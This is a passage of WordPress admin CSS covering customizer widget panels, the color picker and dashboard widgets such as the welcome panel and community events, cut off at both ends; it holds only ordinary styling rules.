#dcdcde; } #gallery-settings select#columns { width: 6em; } #sort-buttons { font-size: 0.8em; margin: 3px 0 -8px 25px; text-align: left; max-width: 625px; } #sort-buttons a { text-decoration: none; } #sort-buttons #asc, #sort-buttons #showall { padding-right: 5px; } #sort-buttons span { margin-left: 25px; } p.media-types { margin: 0; padding: 1em; } p.media-types-required-info { padding-top: 0; } tr.not-image { display: none; } table.not-image tr.not-image { display: table-row; } table.not-image tr.image-only { display: none; } /** * HiDPI Displays */ @media print, (min-resolution: 120dpi) { .image-align-none-label { background-image: url(../images/align-none-2x.png?ver=20120916); background-size: 21px 15px; } .image-align-left-label { background-image: url(../images/align-left-2x.png?ver=20120916); background-size: 22px 15px; } .image-align-center-label { background-image: url(../images/align-center-2x.png?ver=20120916); background-size: 21px 15px; } .image-align-right-label { background-image: url(../images/align-right-2x.png?ver=20120916); background-size: 22px 15px; } } .wp-full-overlay-sidebar { overflow: visible; } /** * Hide all sidebar sections by default, only show them (via JS) once the * preview loads and we know whether the sidebars are used in the template. */ .control-section.control-section-sidebar, .customize-control-sidebar_widgets label, .customize-control-sidebar_widgets .hide-if-js { /* The link in .customize-control-sidebar_widgets .hide-if-js will fail if it ever gets used. */ display: none; } .control-section.control-section-sidebar .accordion-section-content.ui-sortable { overflow: visible; } /* Note: widget-tops are more compact when (max-height: 700px) and (min-width: 981px). */ .customize-control-widget_form .widget-top { background: #fff; transition: opacity 0.5s; } .customize-control .widget-action { color: #787c82; } .customize-control .widget-top:hover .widget-action, .customize-control .widget-action:focus { color: #1d2327; } .customize-control-widget_form:not(.widget-rendered) .widget-top { opacity: 0.5; } .customize-control-widget_form .widget-control-save { display: none; } .customize-control-widget_form .spinner { visibility: hidden; margin-top: 0; } .customize-control-widget_form.previewer-loading .spinner { visibility: visible; } .customize-control-widget_form.widget-form-disabled .widget-content { opacity: 0.7; pointer-events: none; -webkit-user-select: none; user-select: none; } .customize-control-widget_form .widget { margin-bottom: 0; } .customize-control-widget_form.wide-widget-control .widget-inside { position: fixed; left: 299px; top: 25%; border: 1px solid #dcdcde; overflow: auto; } .customize-control-widget_form.wide-widget-control .widget-inside > .form { padding: 20px; } .customize-control-widget_form.wide-widget-control .widget-top { transition: background-color 0.4s; } .customize-control-widget_form.wide-widget-control.expanding .widget-top, .customize-control-widget_form.wide-widget-control.expanded:not(.collapsing) .widget-top { background-color: #dcdcde; } .widget-inside { padding: 1px 10px 10px; border-top: none; line-height: 1.23076923; } .customize-control-widget_form.expanded .widget-action .toggle-indicator:before { content: "\f142"; } .customize-control-widget_form.wide-widget-control .widget-action .toggle-indicator:before { content: "\f139"; } .customize-control-widget_form.wide-widget-control.expanded .widget-action .toggle-indicator:before { content: "\f141"; } .widget-title-action { cursor: pointer; } .widget-top, .customize-control-widget_form .widget .customize-control-title { cursor: move; } .control-section.accordion-section.highlighted > .accordion-section-title, .customize-control-widget_form.highlighted { outline: none; box-shadow: 0 0 2px rgba(79, 148, 212, 0.8); position: relative; z-index: 1; } #widget-customizer-control-templates { display: none; } /** * Widget reordering styles */ #customize-theme-controls .widget-reorder-nav { display: none; float: right; background-color: #f6f7f7; } .move-widget:before { content: "\f504"; content: "\f504" / ''; } #customize-theme-controls .move-widget-area { display: none; background: #fff; border: 1px solid #c3c4c7; border-top: none; cursor: auto; } #customize-theme-controls .reordering .move-widget-area.active { display: block; } #customize-theme-controls .move-widget-area .description { margin: 0; padding: 15px 20px; font-weight: 400; } #customize-theme-controls .widget-area-select { margin: 0; padding: 0; list-style: none; } #customize-theme-controls .widget-area-select li { position: relative; margin: 0; padding: 13px 15px 15px 42px; color: #50575e; border-top: 1px solid #c3c4c7; cursor: pointer; -webkit-user-select: none; user-select: none; } #customize-theme-controls .widget-area-select li:before { display: none; content: "\f147"; content: "\f147" / ''; position: absolute; top: 12px; left: 10px; font: normal 20px/1 dashicons; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } #customize-theme-controls .widget-area-select li:last-child { border-bottom: 1px solid #c3c4c7; } #customize-theme-controls .widget-area-select .selected { color: #fff; background: var(--wp-admin-theme-color); } #customize-theme-controls .widget-area-select .selected:before { display: block; } #customize-theme-controls .move-widget-actions { text-align: right; padding: 12px; } #customize-theme-controls .reordering .widget-title-action { display: none; } #customize-theme-controls .reordering .widget-reorder-nav { display: block; } /* Text Widget */ .wp-customizer div.mce-inline-toolbar-grp, .wp-customizer div.mce-tooltip { z-index: 500100 !important; } .wp-customizer .ui-autocomplete.wplink-autocomplete { z-index: 500110; /* originally 100110, but z-index of .wp-full-overlay is 500000 */ } .wp-customizer #wp-link-backdrop { z-index: 500100; /* originally 100100, but z-index of .wp-full-overlay is 500000 */ } .wp-customizer #wp-link-wrap { z-index: 500105; /* originally 100105, but z-index of .wp-full-overlay is 500000 */ } /** * Styles for new widget addition panel */ /* override widgets admin page rules in wp-admin/css/widgets.css */ #widgets-left #available-widgets .widget { float: none !important; width: auto !important; } /* Keep rule that is no longer necessary on widgets.php. */ #available-widgets .widget-action { display: none; } .ios #available-widgets { transition: left 0s; } #available-widgets .widget-tpl:hover, #available-widgets .widget-tpl.selected { background: #f6f7f7; border-bottom-color: #c3c4c7; color: var(--wp-admin-theme-color);; border-left: 4px solid var(--wp-admin-theme-color); } #customize-controls .widget-title h3 { font-size: 1em; } #available-widgets .widget-title h3 { padding: 0 0 5px; font-size: 14px; } #available-widgets .widget .widget-description { padding: 0; color: #646970; } @media (prefers-reduced-motion: no-preference) { #customize-preview { transition: all 0.2s; } } body.adding-widget #available-widgets { left: 0; visibility: visible; } body.adding-widget .wp-full-overlay-main { left: 300px; } body.adding-widget #customize-preview { opacity: 0.4; } /** * Widget Icon styling * No plurals in naming. * Ordered from lowest to highest specificity. */ #available-widgets .widget-title { position: relative; } #available-widgets .widget-title:before { content: "\f132"; content: "\f132" / ''; position: absolute; top: -3px; right: 100%; margin-right: 20px; width: 20px; height: 20px; color: #2c3338; font: normal 20px/1 dashicons; text-align: center; box-sizing: border-box; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } /* dashicons-smiley */ #available-widgets [class*="easy"] .widget-title:before { content: "\f328"; content: "\f328" / ''; top: -4px; } /* dashicons-star-filled */ #available-widgets [class*="super"] .widget-title:before, #available-widgets [class*="like"] .widget-title:before { content: "\f155"; content: "\f155" / ''; top: -4px; } /* dashicons-wordpress */ #available-widgets [class*="meta"] .widget-title:before { content: "\f120"; content: "\f120" / ''; } /* dashicons-archive */ #available-widgets [class*="archives"] .widget-title:before { content: "\f480"; content: "\f480" / ''; top: -4px; } /* dashicons-category */ #available-widgets [class*="categor"] .widget-title:before { content: "\f318"; content: "\f318" / ''; top: -4px; } /* dashicons-admin-comments */ #available-widgets [class*="comment"] .widget-title:before, #available-widgets [class*="testimonial"] .widget-title:before, #available-widgets [class*="chat"] .widget-title:before { content: "\f101"; content: "\f101" / ''; } /* dashicons-admin-post */ #available-widgets [class*="post"] .widget-title:before { content: "\f109"; content: "\f109" / ''; } /* dashicons-admin-page */ #available-widgets [class*="page"] .widget-title:before { content: "\f105"; content: "\f105" / ''; } /* dashicons-text */ #available-widgets [class*="text"] .widget-title:before { content: "\f478"; content: "\f478" / ''; } /* dashicons-admin-links */ #available-widgets [class*="link"] .widget-title:before { content: "\f103"; content: "\f103" / ''; } /* dashicons-search */ #available-widgets [class*="search"] .widget-title:before { content: "\f179"; content: "\f179" / ''; } /* dashicons-menu */ #available-widgets [class*="menu"] .widget-title:before, #available-widgets [class*="nav"] .widget-title:before { content: "\f333"; content: "\f333" / ''; } /* dashicons-tagcloud */ #available-widgets [class*="tag"] .widget-title:before { content: "\f479"; content: "\f479" / ''; } /* dashicons-rss */ #available-widgets [class*="rss"] .widget-title:before { content: "\f303"; content: "\f303" / ''; top: -6px; } /* dashicons-calendar */ #available-widgets [class*="event"] .widget-title:before, #available-widgets [class*="calendar"] .widget-title:before { content: "\f145"; content: "\f145" / ''; top: -4px; } /* dashicons-format-image */ #available-widgets [class*="image"] .widget-title:before, #available-widgets [class*="photo"] .widget-title:before, #available-widgets [class*="slide"] .widget-title:before, #available-widgets [class*="instagram"] .widget-title:before { content: "\f128"; content: "\f128" / ''; } /* dashicons-format-gallery */ #available-widgets [class*="album"] .widget-title:before, #available-widgets [class*="galler"] .widget-title:before { content: "\f161"; content: "\f161" / ''; } /* dashicons-format-video */ #available-widgets [class*="video"] .widget-title:before, #available-widgets [class*="tube"] .widget-title:before { content: "\f126"; content: "\f126" / ''; } /* dashicons-format-audio */ #available-widgets [class*="music"] .widget-title:before, #available-widgets [class*="radio"] .widget-title:before, #available-widgets [class*="audio"] .widget-title:before { content: "\f127"; content: "\f127" / ''; } /* dashicons-admin-users */ #available-widgets [class*="login"] .widget-title:before, #available-widgets [class*="user"] .widget-title:before, #available-widgets [class*="member"] .widget-title:before, #available-widgets [class*="avatar"] .widget-title:before, #available-widgets [class*="subscriber"] .widget-title:before, #available-widgets [class*="profile"] .widget-title:before, #available-widgets [class*="grofile"] .widget-title:before { content: "\f110"; content: "\f110" / ''; } /* dashicons-cart */ #available-widgets [class*="commerce"] .widget-title:before, #available-widgets [class*="shop"] .widget-title:before, #available-widgets [class*="cart"] .widget-title:before { content: "\f174"; content: "\f174" / ''; top: -4px; } /* dashicons-shield */ #available-widgets [class*="secur"] .widget-title:before, #available-widgets [class*="firewall"] .widget-title:before { content: "\f332"; content: "\f332" / ''; } /* dashicons-chart-bar */ #available-widgets [class*="analytic"] .widget-title:before, #available-widgets [class*="stat"] .widget-title:before, #available-widgets [class*="poll"] .widget-title:before { content: "\f185"; content: "\f185" / ''; } /* dashicons-feedback */ #available-widgets [class*="form"] .widget-title:before { content: "\f175"; content: "\f175" / ''; } /* dashicons-email-alt */ #available-widgets [class*="subscribe"] .widget-title:before, #available-widgets [class*="news"] .widget-title:before, #available-widgets [class*="contact"] .widget-title:before, #available-widgets [class*="mail"] .widget-title:before { content: "\f466"; content: "\f466" / ''; } /* dashicons-share */ #available-widgets [class*="share"] .widget-title:before, #available-widgets [class*="socia"] .widget-title:before { content: "\f237"; content: "\f237" / ''; } /* dashicons-translation */ #available-widgets [class*="lang"] .widget-title:before, #available-widgets [class*="translat"] .widget-title:before { content: "\f326"; content: "\f326" / ''; } /* dashicons-location-alt */ #available-widgets [class*="locat"] .widget-title:before, #available-widgets [class*="map"] .widget-title:before { content: "\f231"; content: "\f231" / ''; } /* dashicons-download */ #available-widgets [class*="download"] .widget-title:before { content: "\f316"; content: "\f316" / ''; } /* dashicons-cloud */ #available-widgets [class*="weather"] .widget-title:before { content: "\f176"; content: "\f176" / ''; top: -4px; } /* dashicons-facebook */ #available-widgets [class*="facebook"] .widget-title:before { content: "\f304"; content: "\f304" / ''; } /* dashicons-twitter */ #available-widgets [class*="tweet"] .widget-title:before, #available-widgets [class*="twitter"] .widget-title:before { content: "\f301"; content: "\f301" / ''; } @media screen and (max-height: 700px) and (min-width: 981px) { /* Compact widget-tops on smaller laptops, but not tablets. See ticket #27112#comment:4 */ .customize-control-widget_form { margin-bottom: 0; } .widget-top { box-shadow: none; margin-top: -1px; } .widget-top:hover { position: relative; z-index: 1; } .last-widget { margin-bottom: 15px; } .widget-title h3 { padding: 13px 15px; } .widget-top .widget-action { padding: 8px 10px; } .widget-reorder-nav span { height: 39px; } .widget-reorder-nav span:before { line-height: 39px; } /* Compact the move widget areas. */ #customize-theme-controls .widget-area-select li { padding: 9px 15px 11px 42px; } #customize-theme-controls .widget-area-select li:before { top: 8px; } } /*! This file is auto-generated */ /* rtl:ignore */ .wp-color-picker { width: 80px; direction: ltr; } .wp-picker-container .hidden { display: none; } /* Needs higher specificity to override `.wp-core-ui .button`. */ .wp-picker-container .wp-color-result.button { min-height: 32px; margin: 0 0 6px 6px; padding: 0 30px 0 0; font-size: 11px; } .wp-color-result-text { background: #f6f7f7; border-radius: 2px 0 0 2px; border-right: 1px solid #c3c4c7; color: #50575e; display: block; line-height: 2.72727273; /* 30px */ padding: 0 6px; text-align: center; } .wp-color-result:hover, .wp-color-result:focus { background: #f6f7f7; border-color: #8c8f94; color: #1d2327; } .wp-color-result:hover:after, .wp-color-result:focus:after { color: #1d2327; border-color: #a7aaad; border-right: 1px solid #8c8f94; } .wp-picker-container { display: inline-block; } .wp-color-result:focus { border-color: #4f94d4; box-shadow: 0 0 3px rgba(34, 113, 177, 0.8); } .wp-color-result:active { /* See Trac ticket #39662 */ transform: none !important; } .wp-picker-open + .wp-picker-input-wrap { display: inline-block; vertical-align: top; } .wp-picker-input-wrap label { display: inline-block; vertical-align: top; } /* For the old `custom-background` page, to override the inline-block and margins from `.form-table td fieldset label`. */ .form-table .wp-picker-input-wrap label { margin: 0 !important; } .wp-picker-input-wrap .button.wp-picker-default, .wp-picker-input-wrap .button.wp-picker-clear, .wp-customizer .wp-picker-input-wrap .button.wp-picker-default, .wp-customizer .wp-picker-input-wrap .button.wp-picker-clear { margin-right: 6px; padding: 0 8px; line-height: 2.72727273; /* 30px */ min-height: 32px; } .wp-picker-container .iris-square-slider .ui-slider-handle:focus { background-color: #50575e } .wp-picker-container .iris-picker { border-radius: 0; border-color: #dcdcde; margin-top: 6px; } .wp-picker-container input[type="text"].wp-color-picker { width: 4rem; font-size: 12px; font-family: monospace; margin: 0; padding: 0 5px; vertical-align: top; min-height: 32px; } .wp-color-picker::-webkit-input-placeholder { color: #646970; } .wp-color-picker::-moz-placeholder { color: #646970; } .wp-picker-container input[type="text"].iris-error { background-color: #fcf0f1; border-color: #d63638; color: #000; } .iris-picker .ui-square-handle:focus, .iris-picker .iris-strip .ui-slider-handle:focus { border-color: var(--wp-admin-theme-color, #3858e9); border-style: solid; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); outline: 2px solid transparent; } .iris-picker .iris-palette:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); } @media screen and (max-width: 782px) { .wp-picker-container input[type="text"].wp-color-picker { width: 5rem; font-size: 16px; line-height: 1.875; /* 30px */ min-height: 32px; } .wp-customizer .wp-picker-container input[type="text"].wp-color-picker { padding: 0 5px; } .wp-picker-input-wrap .button.wp-picker-default, .wp-picker-input-wrap .button.wp-picker-clear { padding: 0 8px; line-height: 2.14285714; /* 30px */ min-height: 32px; } .wp-customizer .wp-picker-input-wrap .button.wp-picker-default, .wp-customizer .wp-picker-input-wrap .button.wp-picker-clear { padding: 0 8px; font-size: 14px; line-height: 2.14285714; /* 30px */ min-height: 32px; } .wp-picker-container .wp-color-result.button { padding: 0 40px 0 0; font-size: 14px; line-height: 2.14285714; /* 30px */ } .wp-customizer .wp-picker-container .wp-color-result.button { font-size: 14px; line-height: 2.14285714; /* 30px */ } .wp-picker-container .wp-color-result-text { padding: 0 14px; font-size: inherit; line-height: inherit; } .wp-customizer .wp-picker-container .wp-color-result-text { padding: 0 10px; } } /*! This file is auto-generated */ #wpbody-content #dashboard-widgets.columns-1 .postbox-container { width: 100%; } #wpbody-content #dashboard-widgets.columns-2 .postbox-container { width: 49.5%; } #wpbody-content #dashboard-widgets.columns-2 #postbox-container-2, #wpbody-content #dashboard-widgets.columns-2 #postbox-container-3, #wpbody-content #dashboard-widgets.columns-2 #postbox-container-4 { float: left; width: 50.5%; } #wpbody-content #dashboard-widgets.columns-3 .postbox-container { width: 33.5%; } #wpbody-content #dashboard-widgets.columns-3 #postbox-container-1 { width: 33%; } #wpbody-content #dashboard-widgets.columns-3 #postbox-container-3, #wpbody-content #dashboard-widgets.columns-3 #postbox-container-4 { float: left; } #wpbody-content #dashboard-widgets.columns-4 .postbox-container { width: 25%; } #dashboard-widgets .postbox-container { width: 25%; } #dashboard-widgets-wrap .columns-3 #postbox-container-4 .empty-container { border: none !important; } #dashboard-widgets-wrap { overflow: hidden; margin: 0 -8px; } #dashboard-widgets .postbox { border-radius: 8px; } #dashboard-widgets .postbox-header .hndle { padding: 12px 16px; } #dashboard-widgets .postbox .inside { margin-bottom: 0; } #dashboard-widgets .meta-box-sortables { display: flow-root; /* avoid margin collapsing between parent and first/last child elements */ /* Required min-height to make the jQuery UI Sortable drop zone work. */ min-height: 0; margin: 0 8px 20px; } #dashboard-widgets .meta-box-sortables:not(:empty) { margin-bottom: 16px; } #dashboard-widgets .postbox-container .empty-container { outline: 2px dashed rgb(0, 0, 0, 0.15); outline-offset: -2px; border-radius: 8px; height: 250px; margin: 4px; } /* Only highlight drop zones when dragging. */ .is-dragging-metaboxes #dashboard-widgets .meta-box-sortables { border-radius: 8px; background: rgb(var(--wp-admin-theme-color--rgb), 0.04); min-height: 100px; } .is-dragging-metaboxes #dashboard-widgets .postbox-container .empty-container { background: rgb(0, 0, 0, 0.01); } #dashboard-widgets .postbox-container .empty-container:after { content: attr(data-emptystring); margin: auto; position: absolute; top: 50%; right: 0; left: 0; transform: translateY( -50% ); padding: 0 2em; text-align: center; color: #646970; font-size: 16px; line-height: 1.5; display: none; } /* @todo: this was originally in this section, but likely belongs elsewhere */ #the-comment-list td.comment p.comment-author { margin-top: 0; margin-right: 0; } #the-comment-list p.comment-author img { float: right; margin-left: 8px; } #the-comment-list p.comment-author strong a { border: none; } #the-comment-list td { vertical-align: top; } #the-comment-list td.comment { word-wrap: break-word; } #the-comment-list td.comment img { max-width: 100%; } /* Screen meta exception for when the "Dashboard" heading is missing or located below the Welcome Panel. */ .index-php #screen-meta-links { margin: 0 0 8px 20px; } /* Welcome Panel */ .welcome-panel { position: relative; overflow: auto; margin: 16px 0; border-radius: 8px; font-size: 14px; line-height: 1.3; clear: both; } .welcome-panel h2 { margin: 0; font-size: 48px; font-weight: 600; line-height: 1.25; } .welcome-panel h3 { margin: 0; font-size: 20px; font-weight: 400; line-height: 1.4; } .welcome-panel p { font-size: inherit; line-height: inherit; } .welcome-panel-header { position: relative; color: #fff; } .welcome-panel-header-image { position: absolute !important; top: 0; left: 0; bottom: 0; right: 0; z-index: 0 !important; overflow: hidden; } .welcome-panel-header-image svg { display: block; margin: auto; width: 100%; height: 100%; } .rtl .welcome-panel-header-image svg { transform: scaleX(-1); } .welcome-panel-header * { color: inherit; position: relative; z-index: 1; } .welcome-panel-header a:focus, .welcome-panel-header a:hover { color: inherit; text-decoration: none; } .welcome-panel-header a:focus, .welcome-panel .welcome-panel-close:focus { outline-color: currentColor; outline-offset: 1px; box-shadow: none; } .welcome-panel-header p { margin: 0.5em 0 0; font-size: 20px; line-height: 1.4; } .welcome-panel .welcome-panel-close { display: flex; align-items: center; position: absolute; top: 10px; left: 10px; padding: 10px 15px; font-size: 13px; line-height: 1.23076923; /* Chrome rounding, needs to be 16px equivalent */ text-decoration: none; z-index: 1; /* Raise above the version image. */ } .welcome-panel .welcome-panel-close:before { transition: all .1s ease-in-out; content: '\f335'; font-size: 24px; color: #fff; } .welcome-panel .welcome-panel-close { color: #fff; } .welcome-panel .welcome-panel-close:hover, .welcome-panel .welcome-panel-close:focus, .welcome-panel .welcome-panel-close:hover::before, .welcome-panel .welcome-panel-close:focus::before { color: #fff972; } /* @deprecated 5.9.0 -- Button removed from panel. */ .wp-core-ui .welcome-panel .button.button-hero { margin: 15px 0 3px 13px; padding: 12px 36px; height: auto; line-height: 1.4285714; white-space: normal; } .welcome-panel-content { min-height: 400px; display: flex; flex-direction: column; justify-content: space-between; } .welcome-panel-header-wrap { background-color: #151515; } .welcome-panel-header { box-sizing: border-box; margin-right: auto; margin-left: auto; max-width: 1500px; width: 100%; padding: 48px 48px 80px 0; } .welcome-panel .welcome-panel-column-container { box-sizing: border-box; width: 100%; clear: both; display: grid; z-index: 1; padding: 24px; grid-template-columns: repeat(3, 1fr); gap: 32px; align-self: flex-end; background: #ffffff; border: 1px solid #c3c4c7; border-top: 0; border-radius: 0 0 8px 8px; } [class*="welcome-panel-icon"] { height: 60px; width: 60px; background-position: center; background-size: 24px 24px; background-repeat: no-repeat; border-radius: 100%; } .welcome-panel-column > svg { margin-top: 4px; } .welcome-panel-column { display: grid; grid-template-columns: min-content 1fr; gap: 24px; } .welcome-panel-icon-pages { background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M7 13.8h6v-1.5H7v1.5zM18 16V4c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h10c1.1 0 2-.9 2-2zM5.5 16V4c0-.3.2-.5.5-.5h10c.3 0 .5.2.5.5v12c0 .3-.2.5-.5.5H6c-.3 0-.5-.2-.5-.5zM7 10.5h8V9H7v1.5zm0-3.3h8V5.8H7v1.4zM20.2 6v13c0 .7-.6 1.2-1.2 1.2H8v1.5h11c1.5 0 2.7-1.2 2.7-2.8V6h-1.5z' /%3E%3C/svg%3E"); } .welcome-panel-icon-layout { background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M18 5.5H6a.5.5 0 00-.5.5v3h13V6a.5.5 0 00-.5-.5zm.5 5H10v8h8a.5.5 0 00.5-.5v-7.5zm-10 0h-3V18a.5.5 0 00.5.5h2.5v-8zM6 4h12a2 2 0 012 2v12a2 2 0 01-2 2H6a2 2 0 01-2-2V6a2 2 0 012-2z' /%3E%3C/svg%3E"); } .welcome-panel-icon-styles { background-image: url("data:image/svg+xml,%3Csvg viewBox='0 0 24 24' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath fill='%23fff' d='M12 4c-4.4 0-8 3.6-8 8v.1c0 4.1 3.2 7.5 7.2 7.9h.8c4.4 0 8-3.6 8-8s-3.6-8-8-8zm0 15V5c3.9 0 7 3.1 7 7s-3.1 7-7 7z' /%3E%3C/svg%3E"); } /* @deprecated 5.9.0 -- Section removed from welcome panel. */ .welcome-panel .welcome-widgets-menus { line-height: 1.14285714; } /* @deprecated 5.9.0 -- Lists removed from welcome panel. */ .welcome-panel .welcome-panel-column ul { margin: 0.8em 0 1em 1em; } /* @deprecated 5.9.0 -- Lists removed from welcome panel. */ .welcome-panel li { font-size: 14px; } /* @deprecated 5.9.0 -- Lists removed from welcome panel. */ .welcome-panel li a { text-decoration: none; } /* @deprecated 5.9.0 -- Lists removed from welcome panel. */ .welcome-panel .welcome-panel-column li { line-height: 1.14285714; list-style-type: none; padding: 0 0 8px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-icon { background: transparent !important; } /* Welcome Panel and Right Now common Icons style */ /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-icon:before, #dashboard_right_now li a:before, #dashboard_right_now li span:before, #dashboard_right_now .search-engines-info:before { color: #646970; font: normal 20px/1 dashicons; display: inline-block; padding: 0 0 0 10px; position: relative; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none !important; vertical-align: top; } /* Welcome Panel specific Icons styles */ /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-write-blog:before, .welcome-panel .welcome-edit-page:before { content: "\f119"; content: "\f119" / ''; top: -3px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-add-page:before { content: "\f132"; content: "\f132" / ''; top: -1px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-setup-home:before { content: "\f102"; content: "\f102" / ''; top: -1px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-view-site:before { content: "\f115"; content: "\f115" / ''; top: -2px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-widgets-menus:before { content: "\f116"; content: "\f116" / ''; top: -2px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-widgets:before { content: "\f538"; content: "\f538" / ''; top: -2px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-menus:before { content: "\f163"; content: "\f163" / ''; top: -2px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-comments:before { content: "\f117"; content: "\f117" / ''; top: -1px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-learn-more:before { content: "\f118"; content: "\f118" / ''; top: -1px; } /* Right Now specific Icons styles */ #dashboard_right_now .search-engines-info:before, #dashboard_right_now li a:before, #dashboard_right_now li > span:before { /* get only the first level span to exclude screen-reader-text in mu-storage */ padding: 0 0 0 5px; /* generic icon for items added by CPTs ? */ content: "\f159"; content: "\f159" / ''; } #dashboard_right_now .page-count a:before, #dashboard_right_now .page-count span:before { content: "\f105"; content: "\f105" / ''; } #dashboard_right_now .post-count a:before, #dashboard_right_now .post-count span:before { content: "\f109"; content: "\f109" / ''; } #dashboard_right_now .comment-count a:before { content: "\f101"; content: "\f101" / ''; } #dashboard_right_now .comment-mod-count a:before { content: "\f125"; content: "\f125" / ''; } #dashboard_right_now .storage-count a:before { content: "\f104"; content: "\f104" / ''; } #dashboard_right_now .storage-count.warning a:before { content: "\f153"; content: "\f153" / ''; } #dashboard_right_now .search-engines-info:before { content: "\f348"; content: "\f348" / ''; color: #d63638; } /* Dashboard WordPress events */ .community-events-errors { margin: 0; } .community-events-loading { padding: 10px 12px 8px; } .community-events { margin-bottom: 6px; padding: 0 12px; } .community-events .spinner { margin: 0 2px 0; } .community-events-errors[aria-hidden="true"], .community-events-errors [aria-hidden="true"], .community-events-loading[aria-hidden="true"], .community-events[aria-hidden="true"], .community-events form[aria-hidden="true"] { display: none; } .community-events .activity-block:first-child, .community-events h2 { padding-top: 12px; padding-bottom: 10px; } .community-events-form { margin: 15px 0 5px; display: flex; gap: 5px; align-items: center; flex-wrap: wrap; } .community-events-form .regular-text { width: 40%; margin: 0; min-height: 32px; padding: 0 8px; } #dashboard-widgets .community-events-form .button { min-height: 32px; line-height: 2.30769231; padding: 0 12px; } .community-events li.event-none { border-right: 4px solid var(--wp-admin-theme-color, #3858e9); } #dashboard-widgets .community-events li.event-none a { text-decoration: underline; } .community-events-form label { line-height: 2.14285714; } .community-events .activity-block > p { margin-bottom: 0; display: inline; } .community-events-toggle-location { vertical-align: middle; } /* Needs higher specificity than #dashboard-widgets .button-link */ #dashboard-widgets .community-events-cancel.button-link { text-decoration: underline; } .community-events ul { background-color: rgba(var(--wp-admin-theme-color--rgb),.08); padding-right: 0; padding-left: 0; padding-bottom: 0; } .community-events li { margin: 0; padding: 8px 12px; color: #2c3338; } .community-events li:first-child { border-top: 1px solid #e9e9ed; } .community-events li ~ li { border-top: 1px solid #e9e9ed; } .community-events .activity-block.last { border-bottom: 1px solid #e9e9ed; padding-top: 0; margin-top: -1px; } .community-events .event-info { display: block; } .community-events .ce-separator::before { content: "\2022"; content: "\2022" / ''; } .event-icon { height: 18px; padding-left: 10px; width: 18px; display: none; /* Hide on smaller screens */ } .event-icon:before { color: #646970; font-size: 18px; } .event-meetup .event-icon:before { content: "\f484"; content: "\f484" / ''; } .event-wordcamp .event-icon:before { content: "\f486"; content: "\f486" / ''; } .community-events .event-title { font-weight: 600; display: block; } .community-events .event-date, .community-events .event-time { display: block; } .community-events-footer { margin-top: 0; margin-bottom: 0; padding: 12px; border-top: 1px solid #f0f0f1; color: #646970; } /* Safari 10 + VoiceOver specific: without this, the hidden text gets read out before the link. */ .community-events-footer .screen-reader-text { height: inherit; white-space: nowrap; } /* Dashboard WordPress news */ #dashboard_primary .inside { margin: 0; padding: 0; } #dashboard_primary .widget-loading { padding: 12px 12px 0; margin-bottom: 1em !important; /* Needs to override `.postbox .inside > p:last-child` in common.css */ } /* Notice when JS is off. */ #dashboard_primary .inside .notice { margin: 0; } body #dashboard-widgets .postbox form .submit { margin: 0; } /* Used only for configurable widgets. */ .dashboard-widget-control-form p { margin-top: 0; } .rssSummary { color: #646970; margin-top: 4px; } #dashboard_primary .rss-widget { font-size: 13px; padding: 0 12px; } #dashboard_primary .rss-widget:last-child { border-bottom: none; padding-bottom: 8px; } #dashboard_primary .rss-widget a { font-weight: 400; } #dashboard_primary .rss-widget span, #dashboard_primary .rss-widget span.rss-date { color: #646970; } #dashboard_primary .rss-widget span.rss-date { margin-right: 12px; } #dashboard_primary .rss-widget ul li { padding: 4px 0; margin: 0; } /* Dashboard right now */ #dashboard_right_now ul { margin: 0; /* contain floats but don't use overflow: hidden */ display: inline-block; width: 100%; } #dashboard_right_now li { width: 50%; float: right; margin-bottom: 10px; } #dashboard_right_now .main p { margin: 0; } #dashboard_right_now #wp-version-message .button { float: left; position: relative; top: -5px; margin-right: 5px; } #dashboard_right_now p.search-engines-info { margin: 1em 0; } .mu-storage { overflow: hidden; } #dashboard-widgets h3.mu-storage { margin: 0 0 10px; padding: 0; font-size: 14px; font-weight: 400; } #network_dashboard_right_now p input { margin: 2px 1px; vertical-align: middle; } /* Dashboard right now - Colors */ #dashboard_right_now .sub { color: #50575e; background: #f6f7f7; border-top: 1px solid #f0f0f1; padding: 10px 12px 6px; } #dashboard_right_now .sub h3 { color: #50575e; } #dashboard_right_now .sub p { margin: 0 0 1em; } #dashboard_right_now .warning a:before, #dashboard_right_now .warning span:before { color: #d63638; } /* Dashboard Quick Draft */ #dashboard_quick_press .inside { margin: 0; padding: 0; } #dashboard_quick_press div.updated { margin-bottom: 10px; border: 1px solid #f0f0f1; border-width: 1px 0 1px 1px; } #dashboard_quick_press form { margin: 12px; } #dashboard_quick_press .drafts { padding: 10px 0 0; } /* Dashboard Quick Draft - Form styling */ #dashboard_quick_press label { display: inline-block; margin-bottom: 4px; } #dashboard_quick_press input, #dashboard_quick_press textarea { box-sizing: border-box; margin: 0; } #dashboard-widgets .postbox form .submit { margin: -39px 0; float: 